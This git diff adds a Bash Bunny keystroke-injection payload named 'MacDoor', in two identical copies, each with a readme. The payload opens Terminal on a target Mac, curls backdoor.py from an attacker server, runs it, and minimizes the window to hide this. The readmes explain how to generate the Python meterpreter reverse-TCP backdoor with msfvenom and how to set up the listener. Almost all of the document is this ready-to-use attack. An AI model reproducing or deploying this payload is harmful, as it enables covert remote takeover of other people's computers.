diff --git a/payloads/library/execution/MacDoor/payload.txt b/payloads/library/execution/MacDoor/payload.txt new file mode 100644 index 000000000..4c5038fc4 --- /dev/null +++ b/payloads/library/execution/MacDoor/payload.txt @@ -0,0 +1,47 @@ +#!/bin/bash +# +# Title: MacDoor +# Description: Download a Python backdoor from our server, run it in terminal and minimize the terminal window. +# Author: afsh4ck +# Version: 1.0 +# Target: MacOS +# Category: Execution +# +# Steps: +# Step 1: msfvenom -p python/meterpreter/reverse_tcp LHOST={your IP} LPORT=4444 -o backdoor.py +# Step 2: mount a local server 'python3 -m http.server' +# Step 3: msfconsole multi/handler listener open before the attack. +# +# Note: +# You need to modify the script with your attacker IP and the port or your local server. +# +# Purple.............Setup +# Yellow blink.......Attack Mode ON +# Green..............Finish + +LED SETUP +ATTACKMODE HID STORAGE ECM_ETHERNET +LED ATTACK + +# Open terminal +QUACK GUI SPACE +QUACK DELAY 500 +QUACK STRING Terminal +QUACK ENTER +QUACK DELAY 3000 + +# Execute attack +QUACK STRING curl http://192.168.1.139:8000/backdoor.py -o Downloads/backdoor.py +QUACK ENTER +QUACK DELAY 1000 +QUACK STRING cd Downloads +QUACK ENTER +QUACK STRING python3 backdoor.py +QUACK ENTER + +# Minimize terminal +QUACK GUI m +QUACK DELAY 2000 + +# Standby +LED FINISH diff --git a/payloads/library/execution/MacDoor/readme.md b/payloads/library/execution/MacDoor/readme.md new file mode 100644 index 000000000..5e82e9ccd --- /dev/null +++ b/payloads/library/execution/MacDoor/readme.md @@ -0,0 +1,30 @@ +# MacDoor - Python Backdoor Execution for the BashBunny + +``` + __ ___ ____ + / |/ /____ _ _____ / __ \ ____ ____ _____ + / /|_/ // __ `// ___// / / // __ \ / __ \ / ___/ + / / / // /_/ // /__ / /_/ // /_/ // /_/ // / +/_/ /_/ \__,_/ \___//_____/ \____/ \____//_/ +``` + +* Author: afsh4ck +* Version: 1.0 +* Target: MacOS +* Tested on: Ventura 13.3.1 +* Category: Execution + +# DESCRIPTION + +Download a Python backdoor from our server, run it in terminal and minimize the terminal window. + +# STEPS + +* Step 1: msfvenom -p python/meterpreter/reverse_tcp LHOST={your IP} LPORT=4444 -o backdoor.py +* Step 2: mount a local server 'python3 -m http.server' +* Step 3: msfconsole multi/handler listener open before the attack. + +# NOTE + +* You need to modify the script with your attacker IP and the port or your local server. + diff --git a/payloads/library/remote_access/MacDoor/payload.txt b/payloads/library/remote_access/MacDoor/payload.txt new file mode 100644 index 000000000..3ed7bfc7c --- /dev/null +++ b/payloads/library/remote_access/MacDoor/payload.txt @@ -0,0 +1,47 @@ +#!/bin/bash +# +# Title: MacDoor +# Description: Download a Python backdoor from our server, run it in terminal and minimize the terminal window. +# Author: afsh4ck +# Version: 1.0 +# Target: MacOS +# Category: Remote Access +# +# Steps: +# Step 1: msfvenom -p python/meterpreter/reverse_tcp LHOST={your IP} LPORT=4444 -o backdoor.py +# Step 2: mount a local server 'python3 -m http.server' +# Step 3: msfconsole multi/handler listener open before the attack. +# +# Note: +# You need to modify the script with your attacker IP and the port or your local server. +# +# Purple.............Setup +# Yellow blink.......Attack Mode ON +# Green..............Finish + +LED SETUP +ATTACKMODE HID STORAGE ECM_ETHERNET +LED ATTACK + +# Open terminal +QUACK GUI SPACE +QUACK DELAY 500 +QUACK STRING Terminal +QUACK ENTER +QUACK DELAY 3000 + +# Execute attack +QUACK STRING curl http://192.168.1.139:8000/backdoor.py -o Downloads/backdoor.py +QUACK ENTER +QUACK DELAY 1000 +QUACK STRING cd Downloads +QUACK ENTER +QUACK STRING python3 backdoor.py +QUACK ENTER + +# Minimize terminal +QUACK GUI m +QUACK DELAY 2000 + +# Standby +LED FINISH diff --git a/payloads/library/remote_access/MacDoor/readme.md b/payloads/library/remote_access/MacDoor/readme.md new file mode 100644 index 000000000..7fd07093e --- /dev/null +++ b/payloads/library/remote_access/MacDoor/readme.md @@ -0,0 +1,30 @@ +# MacDoor - Python Backdoor Execution for MacOS + +``` + __ ___ ____ + / |/ /____ _ _____ / __ \ ____ ____ _____ + / /|_/ // __ `// ___// / / // __ \ / __ \ / ___/ + / / / // /_/ // /__ / /_/ // /_/ // /_/ // / +/_/ /_/ \__,_/ \___//_____/ \____/ \____//_/ +``` + +* Author: afsh4ck +* Version: 1.0 +* Target: MacOS +* Tested on: Ventura 13.3.1 +* Category: Remote Access + +# DESCRIPTION + +Download a Python backdoor from our server, run it in terminal and minimize the terminal window. + +# STEPS + +* Step 1: msfvenom -p python/meterpreter/reverse_tcp LHOST={your IP} LPORT=4444 -o backdoor.py +* Step 2: mount a local server 'python3 -m http.server' +* Step 3: msfconsole multi/handler listener open before the attack. + +# NOTE + +* You need to modify the script with your attacker IP and the port or your local server. +